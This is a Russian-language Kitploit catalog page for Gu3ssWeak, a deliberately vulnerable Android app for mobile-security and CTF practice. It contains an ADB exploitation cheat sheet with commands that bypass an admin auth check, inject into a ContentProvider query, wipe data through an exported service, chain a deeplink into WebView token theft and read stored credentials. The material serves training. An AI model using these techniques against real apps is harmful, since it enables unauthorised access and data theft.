Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Gu3ssWeak — Намеренно уязвимое Android-приложение для исследований в области мобильной безопасности и практики bug bounty — OWASP Mobile Top 10 | Kitploit
Инструменты/GitHubGitHub/b4sith-sec/gu3ssweak
Безопасность AndroidАнализ уязвимостейПентестинг мобильных приложенийЭксплуатация веб-приложенийCTFТестирование на ПроникновениеМобильная безопасностьОбучение и ОбразованиеУчебные Маршруты и КурсыЛаборатории и Практика
GitHub
82169 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
b4sith-sec/gu3ssweak

Gu3ssWeak

Намеренно уязвимое Android-приложение для исследований в области мобильной безопасности и практики bug bounty — OWASP Mobile Top 10

Репозиторий

Gu3ssWeak

Намеренно уязвимое Android-приложение для исследований в области мобильной безопасности, практики bug bounty и обучения в стиле CTF. Содержит 21 задокументированную уязвимость, сопоставленную с OWASP Mobile Top 10.


Быстрый старт

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

Запустите приложение, пройдите каждую лабораторию, соберите флаги и отправьте их на встроенной таблице результатов CTF.


Категории лабораторий

КатегорияУязвимостиФлаги
WebViewWV-01 to WV-055
DeeplinkDL-01 to DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 to AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 to BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

Всего 20 флагов, плюс мастер-флаг, выдаваемый за сбор всех остальных.


Скриншоты

Список лабораторийТаблица результатов CTF
lab

Процесс CTF

  1. Откройте приложение — оно сразу открывается на списке лабораторий.
  2. Выберите лабораторию, проэксплуатируйте уязвимость (через UI, ADB или и то, и другое).
  3. Каждая успешная эксплуатация автоматически захватывает свой флаг.
  4. Нажмите "Submit Flag" для подтверждения или проверьте прогресс на "CTF Scoreboard".
  5. Соберите все 18 флагов, чтобы разблокировать мастер-флаг.

Документация

  • ARCHITECTURE.md — как каждый уязвимый компонент работает изнутри
  • MITIGATIONS.md — рекомендации по исправлению и устранению каждой уязвимости, включая концепции эскалации LFI-to-RCE
  • SECURITY.md — политика безопасности и ответственное раскрытие
  • CHECKSUMS.txt — контрольные суммы SHA256 для собранных APK

Шпаргалка по эксплуатации через ADB

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

Отказ от ответственности

Этот проект носит исключительно образовательный характер. Все уязвимости намеренны и задокументированы. Показанные здесь техники применимы к реальным приложениям, но тестируйте только те системы, которыми владеете или на тестирование которых у вас есть разрешение. Полный отказ от ответственности и рекомендации по ответственному раскрытию см. в SECURITY.md.

Лицензия

MIT — см. LICENSE.

Скачать инструмент